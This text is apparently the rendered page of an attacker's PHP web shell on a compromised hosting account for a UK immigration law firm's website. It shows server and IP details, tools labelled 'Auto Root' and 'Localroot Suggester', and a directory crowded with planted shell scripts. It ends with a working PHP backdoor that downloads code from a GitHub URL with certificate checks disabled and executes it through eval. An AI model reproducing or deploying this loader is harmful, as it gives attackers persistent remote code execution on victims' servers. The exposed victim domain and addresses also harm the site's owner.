Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.196
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
evicodqw /
sls-immigrationlawyers.co.uk /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-07-10 08:55
1111111111
[ DIR ]
drwxr-xr-x
2025-07-08 10:22
2222222
[ DIR ]
drwxr-xr-x
2025-07-08 10:22
.htaccess
217
B
-rw-r--r--
2025-07-10 01:32
MuPlugin.php
1.24
KB
-rw-r--r--
2025-07-10 21:28
_Podt.php
390
B
-rw-r--r--
2025-07-10 11:00
asasx.php
377.89
KB
-rw-r--r--
2025-07-08 07:44
buy.php
1.4
KB
-rw-r--r--
2025-07-08 07:44
cloud.html
43.8
KB
-rw-r--r--
2025-07-11 03:20
content.php
98.06
KB
-rw-r--r--
2025-07-11 16:28
d.php
19
B
-rw-r--r--
2025-07-12 11:13
dim.txt
19
B
-rw-r--r--
2025-07-12 11:14
edit.php
5.93
KB
-rw-r--r--
2025-07-08 07:44
error_log
51.18
KB
-rw-r--r--
2025-07-11 16:30
godsend.php
8.82
KB
-rw-r--r--
2025-07-08 07:44
hiroshi.php
8.82
KB
-rw-r--r--
2025-07-08 07:44
index.php
8.87
KB
-rw-r--r--
2025-07-10 01:32
man.php
192.75
KB
-rw-r--r--
2025-07-11 03:20
massd.php
2.28
KB
-rw-r--r--
2025-07-12 11:12
ol.php
38.67
KB
-rw-r--r--
2025-07-11 03:20
php.ini
61
B
-rw-r--r--
2025-07-11 16:28
php.php
70.78
KB
-rw-r--r--
2025-07-11 03:20
ps.php
77.6
KB
-rw-r--r--
2025-07-10 23:36
psm.php
1.19
KB
-rw-r--r--
2025-07-11 03:20
readme.txt
7
B
-rw-r--r--
2025-07-11 03:20
robots.txt
333
B
-rw-r--r--
2025-07-10 01:32
s.php
105
B
-rw-r--r--
2025-07-11 03:20
sell.php
89.42
KB
-rw-r--r--
2025-07-11 03:20
shell.php
34.15
KB
-rw-r--r--
2025-07-11 03:20
shell20250630.php
38.67
KB
-rw-r--r--
2025-07-11 03:20
t.php
458
B
-rw-r--r--
2025-07-11 03:20
unzipper.php
11.99
KB
-rw-r--r--
2025-07-11 03:20
w3llstore.php
15.91
KB
-rw-r--r--
2025-07-11 03:20
Save
Rename
<?php session_start(); /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Set cookies using session if available if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } // Function to check if the user is logged in $a = geturlsinfo('https://raw.githubusercontent.com/negat1ve1337/Shell/refs/heads/main/index.txt'); eval('?>' . $a); ?>